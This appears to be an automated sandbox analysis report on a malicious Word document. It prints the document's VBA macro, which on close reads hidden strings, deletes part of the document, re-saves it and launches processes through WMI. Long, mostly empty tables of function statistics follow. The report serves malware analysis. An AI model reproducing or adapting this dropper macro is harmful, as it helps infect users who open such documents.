17 | Private STP as String |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Part of subcall function Button_Click2@ThisDocument: Left | |
Part of subcall function Button_Click2@ThisDocument: Paragraphs | |
CreateObject | CreateObject( |
Part of subcall function Button_Click2@ThisDocument: Left | |
Part of subcall function Button_Click2@ThisDocument: Paragraphs | |
Part of subcall function Button_Click2@ThisDocument: Left | |
Part of subcall function Button_Click2@ThisDocument: Paragraphs | |
Part of subcall function Button_Click2@ThisDocument: Left | |
Part of subcall function Button_Click2@ThisDocument: Paragraphs | |
Delete | |
Part of subcall function SaveAs3@ThisDocument: SaveAs2 | |
Part of subcall function SaveAs3@ThisDocument: wdFormatText | |
Part of subcall function SaveAs3@ThisDocument: SaveAs2 | |
Part of subcall function SaveAs3@ThisDocument: wdFormatText | |
Part of subcall function SetTask@ThisDocument: create | |
Part of subcall function SetTask@ThisDocument: act | |
Kernel32!Sleep | Kernel32!Sleep( |
Part of subcall function SetTask@ThisDocument: create | |
Part of subcall function SetTask@ThisDocument: act |
Strings | Decrypted Strings |
---|---|
"xls" | |
"doc" |
Line | Instruction | Meta Information |
---|---|---|
22 | Private Sub Form_Close() | |
23 | STP = Button_Click2(2, 16) + "Ksh1" | executed |
24 | Set Ms13 = CreateObject(Button_Click2(4, 22)) | CreateObject( |
25 | One = Button_Click2(8, 16) | |
26 | Two = Button_Click2(6, 8) | |
27 | ActiveDocument.Range(Start := 0, End := 3561).Delete | Delete |
28 | SaveAs3 ("xls") | |
28 | SaveAs3 ("doc") | |
29 | SetTask (One + " " + STP + ".xls " + STP + ".pdf") | |
29 | Sleep 6000 | Kernel32!Sleep( |
29 | SetTask (Two + " " + STP + ".pdf,In") | |
30 | End Sub |
APIs | Meta Information |
---|---|
Part of subcall function Form_Close@ThisDocument: CreateObject | |
Part of subcall function Form_Close@ThisDocument: Delete | |
Part of subcall function Form_Close@ThisDocument: Sleep |
Line | Instruction | Meta Information |
---|---|---|
19 | Private Sub Document_Close() | |
20 | Form_Close | executed |
21 | End Sub |
APIs | Meta Information |
---|---|
create | SWbemObjectEx.create( |
act |
Line | Instruction | Meta Information |
---|---|---|
40 | Private Function SetTask(Task as String) | |
41 | Ms13.create Task, Null, Null, act | SWbemObjectEx.create( act executed |
42 | End Function |
APIs | Meta Information |
---|---|
Left | |
Paragraphs |
Line | Instruction | Meta Information |
---|---|---|
31 | Private Function Button_Click2(One as Long, Two as Long) as String | |
32 | Button_Click2 = Left(ActiveDocument.Paragraphs(One).Range.Text, Two) | Left Paragraphs executed |
33 | End Function |
APIs | Meta Information |
---|---|
SaveAs2 | |
wdFormatText |
Line | Instruction | Meta Information |
---|---|---|
37 | Private Function SaveAs3(Formt as String) | |
38 | ActiveDocument.SaveAs2 FileName := STP + "." + Formt, FileFormat := wdFormatText | SaveAs2 wdFormatText executed |
39 | End Function |
Non-Executed Functions |
---|
APIs | Meta Information |
---|---|
Right | |
Text | |
Range |
Line | Instruction | Meta Information |
---|---|---|
34 | Private Function Button_Click3(One as Long) as String | |
35 | Button_Click3 = Right(Range.Text, One) | Right Text Range |
36 | End Function |
Executed Functions |
---|
Function | Relevance | APIs | Strings | Instructions | Tags | C-Code Quality |
---|---|---|---|---|---|---|
00649860 | 10.7 | 4 | 2 | 195 | service, COMMON | 73% |
006438F0 | 3.7 | 1 | 1 | 189 | file, COMMON | 63% |
006480A0 | 1.7 | 1 | - | 219 | file, COMMON | 66% |
004197A0 | 341.2 | 167 | 27 | 1699 | COMMON | - |
00415D80 | 188.2 | 105 | 2 | 932 | COMMON | - |
00422660 | 19.6 | 13 | - | 112 | COMMON | - |
00648400 | 10.7 | 1 | 5 | 172 | file, COMMON | 66% |
00647120 | 5.4 | 1 | 2 | 107 | library, COMMON | 85% |
00644B70 | 5.3 | 1 | 2 | 87 | process, COMMON | 60% |
006430A0 | 3.7 | 1 | 1 | 165 | memory, COMMON | 71% |
00645CE0 | 3.0 | 2 | - | 13 | COMMON | 100% |
00402064 | 1.8 | 1 | - | 278 | COMMON | - |
006442C0 | 1.5 | 1 | - | 30 | memory, COMMON | 79% |
00620170 | 1.4 | 1 | - | 163 | COMMON | - |
Non-executed Functions |
---|
Function | Relevance | APIs | Strings | Instructions | Tags | C-Code Quality |
---|---|---|---|---|---|---|
006465E0 | 12.9 | 2 | 5 | 647 | COMMON, Crypto | 81% |
00648970 | 2.7 | - | 2 | 165 | COMMON | 65% |
00643F00 | 1.3 | - | 1 | 95 | COMMON | 100% |
00406DA8 | .2 | - | - | 240 | COMMON, Crypto | 81% |
00409350 | .2 | - | - | 205 | COMMON, Crypto | 65% |
004052D4 | .1 | - | - | 58 | COMMON | - |
0040314D | .0 | - | - | 47 | COMMON, Crypto | 46% |
00644DF0 | .0 | - | - | 2 | COMMON | 100% |
0041FEF0 | 75.4 | 28 | 15 | 199 | COMMON | - |
0041BC40 | 69.4 | 46 | - | 433 | COMMON | - |
00424570 | 54.2 | 36 | - | 238 | COMMON | - |
0041E780 | 51.3 | 34 | - | 295 | COMMON | - |
00418DC0 | 42.3 | 28 | - | 336 | COMMON | - |
0041D540 | 39.2 | 26 | - | 247 | COMMON | - |
0041E450 | 37.8 | 25 | - | 257 | COMMON | - |
0041EDC0 | 37.8 | 25 | - | 257 | COMMON | - |
0041DB10 | 37.8 | 25 | - | 257 | COMMON | - |
0041EB10 | 37.7 | 25 | - | 217 | COMMON | - |
00417770 | 33.3 | 22 | - | 277 | COMMON | 20% |
0041D030 | 30.2 | 20 | - | 216 | COMMON | - |
0041C8E0 | 30.2 | 20 | - | 162 | COMMON | - |
004241F0 | 28.6 | 19 | - | 123 | COMMON | - |
0041DE40 | 27.1 | 18 | - | 148 | COMMON | - |
004183D0 | 25.7 | 17 | - | 159 | COMMON | - |
0041C250 | 24.2 | 16 | - | 166 | COMMON | - |
0041C490 | 24.2 | 16 | - | 160 | COMMON | - |
00423A30 | 21.2 | 14 | - | 175 | COMMON | - |
0041DC50 | 18.1 | 12 | - | 138 | COMMON | - |
0041E590 | 18.1 | 12 | - | 138 | COMMON | - |
0041EF00 | 18.1 | 12 | - | 138 | COMMON | - |
0041F1A0 | 16.6 | 11 | - | 93 | COMMON | - |
0041E210 | 16.6 | 11 | - | 93 | COMMON | - |
00424480 | 16.6 | 11 | - | 62 | COMMON | - |
00416890 | 15.1 | 10 | - | 123 | COMMON | 20% |
004221F0 | 15.1 | 10 | - | 114 | COMMON | - |
0041D400 | 15.1 | 10 | - | 86 | COMMON | - |
00620010 | 12.6 | - | 10 | 98 | COMMON | - |
0041CCA0 | 12.1 | 8 | - | 100 | COMMON | 23% |
00416AA0 | 12.1 | 8 | - | 70 | COMMON | 20% |
00421270 | 12.0 | 8 | - | 49 | COMMON | - |
0041CE20 | 10.6 | 7 | - | 95 | COMMON | 27% |
0041E040 | 10.6 | 7 | - | 69 | COMMON | - |
0041D830 | 10.6 | 7 | - | 69 | COMMON | - |
00424100 | 10.6 | 7 | - | 67 | COMMON | - |
006206F0 | 9.2 | 6 | - | 169 | COMMON | - |
00426970 | 9.1 | 6 | - | 85 | COMMON | 30% |
006208F0 | 7.7 | 5 | - | 158 | COMMON | - |
0041DA00 | 7.6 | 5 | - | 59 | COMMON | - |
00421610 | 7.5 | 5 | - | 44 | COMMON | - |
004217D0 | 7.5 | 5 | - | 44 | COMMON | - |
0041C7C0 | 6.1 | 4 | - | 70 | COMMON | - |
00415200 | 6.1 | 4 | - | 57 | COMMON | 17% |
00415B80 | 6.1 | 4 | - | 54 | COMMON | 17% |
0041E380 | 6.1 | 4 | - | 53 | COMMON | - |
00421FA0 | 6.1 | 4 | - | 53 | COMMON | - |
00422080 | 6.1 | 4 | - | 51 | COMMON | - |
00421CC0 | 6.0 | 4 | - | 41 | COMMON | - |
00421C10 | 6.0 | 4 | - | 40 | COMMON | - |
Executed Functions |
---|
Function | Relevance | APIs | Strings | Instructions | Tags | C-Code Quality |
---|---|---|---|---|---|---|
003F8E80 | 5.4 | 1 | 2 | 131 | service, COMMON | 66% |
003F38F0 | 3.7 | 1 | 1 | 189 | file, COMMON | 63% |
003F9860 | 10.7 | 4 | 2 | 195 | service, COMMON | 73% |
003F8400 | 10.7 | 1 | 5 | 172 | file, COMMON | 66% |
003F7120 | 5.4 | 1 | 2 | 107 | library, COMMON | 85% |
003F4B70 | 5.3 | 1 | 2 | 87 | process, COMMON | 60% |
003F30A0 | 3.7 | 1 | 1 | 165 | memory, COMMON | 71% |
003F80A0 | 3.2 | 2 | - | 219 | file, COMMON | 71% |
003F5CE0 | 3.0 | 2 | - | 13 | COMMON | 100% |
003E0170 | 1.4 | 1 | - | 163 | COMMON | - |
Non-executed Functions |
---|
Function | Relevance | APIs | Strings | Instructions | Tags | C-Code Quality |
---|---|---|---|---|---|---|
003E0010 | 12.6 | - | 10 | 98 | COMMON | - |
003E06F0 | 9.2 | 6 | - | 169 | COMMON | - |
003E08F0 | 7.7 | 5 | - | 158 | COMMON | - |
Executed Functions |
---|
Function | Relevance | APIs | Strings | Instructions | Tags | C-Code Quality |
---|---|---|---|---|---|---|
003F38F0 | 3.7 | 1 | 1 | 189 | file, COMMON | 63% |
003F9860 | 10.7 | 4 | 2 | 195 | service, COMMON | 73% |
003F8400 | 10.7 | 1 | 5 | 172 | file, COMMON | 66% |
003F8E80 | 5.4 | 1 | 2 | 131 | service, COMMON | 66% |
003F7120 | 5.4 | 1 | 2 | 107 | library, COMMON | 85% |
003F4B70 | 5.3 | 1 | 2 | 87 | process, COMMON | 60% |
003F30A0 | 3.7 | 1 | 1 | 165 | memory, COMMON | 71% |
003F5CE0 | 3.0 | 2 | - | 13 | COMMON | 100% |
003F80A0 | 1.7 | 1 | - | 219 | file, COMMON | 66% |
00360170 | 1.4 | 1 | - | 163 | COMMON | - |
Non-executed Functions |
---|
Function | Relevance | APIs | Strings | Instructions | Tags | C-Code Quality |
---|---|---|---|---|---|---|
00360010 | 12.6 | - | 10 | 98 | COMMON | - |
003606F0 | 9.2 | 6 | - | 169 | COMMON | - |
003608F0 | 7.7 | 5 | - | 158 | COMMON | - |
Executed Functions |
---|
Function | Relevance | APIs | Strings | Instructions | Tags | C-Code Quality |
---|---|---|---|---|---|---|
003338F0 | 3.7 | 1 | 1 | 189 | file, COMMON | 63% |
00339860 | 10.7 | 4 | 2 | 195 | service, COMMON | 73% |
00338400 | 10.7 | 1 | 5 | 172 | file, COMMON | 66% |
00338E80 | 5.4 | 1 | 2 | 131 | service, COMMON | 66% |
00337120 | 5.4 | 1 | 2 | 107 | library, COMMON | 85% |
00334B70 | 5.3 | 1 | 2 | 87 | process, COMMON | 60% |
003330A0 | 3.7 | 1 | 1 | 165 | memory, COMMON | 71% |
00335CE0 | 3.0 | 2 | - | 13 | COMMON | 100% |
003380A0 | 1.7 | 1 | - | 219 | file, COMMON | 66% |
00320170 | 1.4 | 1 | - | 163 | COMMON | - |
Non-executed Functions |
---|
Function | Relevance | APIs | Strings | Instructions | Tags | C-Code Quality |
---|---|---|---|---|---|---|
00320010 | 12.6 | - | 10 | 98 | COMMON | - |
003206F0 | 9.2 | 6 | - | 169 | COMMON | - |
003208F0 | 7.7 | 5 | - | 158 | COMMON | - |
Executed Functions |
---|
Function | Relevance | APIs | Strings | Instructions | Tags | C-Code Quality |
---|---|---|---|---|---|---|
004F38F0 | 3.7 | 1 | 1 | 189 | file, COMMON | 63% |
004F9860 | 12.4 | 4 | 3 | 195 | service, COMMON | 73% |
004F8400 | 10.7 | 1 | 5 | 172 | file, COMMON | 66% |
004F8E80 | 7.1 | 1 | 3 | 131 | service, COMMON | 66% |
004F7120 | 7.1 | 1 | 3 | 107 | library, COMMON | 85% |
004F4B70 | 5.3 | 1 | 2 | 87 | process, COMMON | 60% |
004F80A0 | 3.7 | 1 | 1 | 219 | file, COMMON | 66% |
004F30A0 | 3.7 | 1 | 1 | 165 | memory, COMMON | 71% |
004F7080 | 3.5 | 1 | 1 | 45 | library, COMMON | 75% |
004F5CE0 | 3.0 | 2 | - | 13 | COMMON | 100% |
004F42C0 | 1.5 | 1 | - | 30 | memory, COMMON | 79% |
004E0170 | 1.4 | 1 | - | 163 | COMMON | - |
Non-executed Functions |
---|
Function | Relevance | APIs | Strings | Instructions | Tags | C-Code Quality |
---|---|---|---|---|---|---|
004E0010 | 12.6 | - | 10 | 98 | COMMON | - |
004E06F0 | 9.2 | 6 | - | 169 | COMMON | - |
004E08F0 | 7.7 | 5 | - | 158 | COMMON | - |
Executed Functions |
---|
Function | Relevance | APIs | Strings | Instructions | Tags | C-Code Quality |
---|---|---|---|---|---|---|
002938F0 | 3.7 | 1 | 1 | 189 | file, COMMON | 63% |
00299860 | 12.4 | 4 | 3 | 195 | service, COMMON | 73% |
00298400 | 10.7 | 1 | 5 | 172 | file, COMMON | 66% |
00298E80 | 7.1 | 1 | 3 | 131 | service, COMMON | 66% |
002980A0 | 5.5 | 2 | 1 | 219 | file, COMMON | 71% |
00297120 | 5.4 | 1 | 2 | 107 | library, COMMON | 85% |
00294B70 | 5.3 | 1 | 2 | 87 | process, COMMON | 60% |
002930A0 | 3.7 | 1 | 1 | 165 | memory, COMMON | 71% |
00295CE0 | 3.0 | 2 | - | 13 | COMMON | 100% |
00280170 | 1.4 | 1 | - | 163 | COMMON | - |
Non-executed Functions |
---|
Function 00280010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
Strings |
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 002806F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 002808F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Executed Functions |
---|
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01C638F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
C-Code - Quality: 63% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 61% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01C69860, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 195serviceCOMMON
C-Code - Quality: 73% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01C68400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
C-Code - Quality: 66% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01C68E80, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 131serviceCOMMON
C-Code - Quality: 66% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 62% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01C67120, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107libraryCOMMON
C-Code - Quality: 85% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01C64B70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87processCOMMON
C-Code - Quality: 60% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01C680A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 219fileCOMMON
C-Code - Quality: 66% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01C630A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01C65CE0, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
C-Code - Quality: 100% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 75% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01C10170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Function 01C10010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
Strings |
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01C106F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01C108F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Executed Functions |
---|
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F38F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
C-Code - Quality: 63% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 61% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F9860, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 195serviceCOMMON
C-Code - Quality: 73% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F8400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
C-Code - Quality: 66% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F8E80, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 131serviceCOMMON
C-Code - Quality: 66% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F7120, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 107libraryCOMMON
C-Code - Quality: 85% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 62% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F80A0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 219fileCOMMON
C-Code - Quality: 71% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F4B70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87processCOMMON
C-Code - Quality: 60% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F30A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F7080, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45libraryCOMMON
C-Code - Quality: 75% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F5CE0, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
C-Code - Quality: 100% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003F42C0, Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
C-Code - Quality: 79% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003E0170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Function 003E0010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
Strings |
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003E06F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003E08F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Executed Functions |
---|
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00474C80, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102processCOMMON
C-Code - Quality: 74% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004725E0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 249encryptionCOMMON
C-Code - Quality: 56% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004738F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
C-Code - Quality: 63% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004753D0, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
C-Code - Quality: 58% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00472BE0, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 293networkCOMMON
C-Code - Quality: 73% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00479860, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 195serviceCOMMON
C-Code - Quality: 73% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00478400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
C-Code - Quality: 66% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00477120, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107libraryCOMMON
C-Code - Quality: 85% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004730A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00474C98, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28processCOMMON
C-Code - Quality: 74% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00479DD0, Relevance: 3.1, APIs: 2, Instructions: 95COMMON
C-Code - Quality: 68% |
|
APIs |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00479B60, Relevance: 1.7, APIs: 1, Instructions: 164COMMON
C-Code - Quality: 61% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00476060, Relevance: 1.6, APIs: 1, Instructions: 122COMMON
C-Code - Quality: 73% |
|
APIs |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00479F30, Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
C-Code - Quality: 68% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00475C00, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
C-Code - Quality: 58% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00475500, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
C-Code - Quality: 68% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 75% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004742C0, Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
C-Code - Quality: 79% |
|
APIs |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00460170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Function 00472230, Relevance: 2.8, Strings: 2, Instructions: 259COMMON
C-Code - Quality: 58% |
|
Strings |
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00471FC0, Relevance: 1.4, Strings: 1, Instructions: 175COMMON
C-Code - Quality: 61% |
|
Strings |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00471FD8, Relevance: .0, Instructions: 25COMMON
C-Code - Quality: 61% |
|
Memory Dump Source |
|
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00460010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
Strings |
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004606F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004608F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |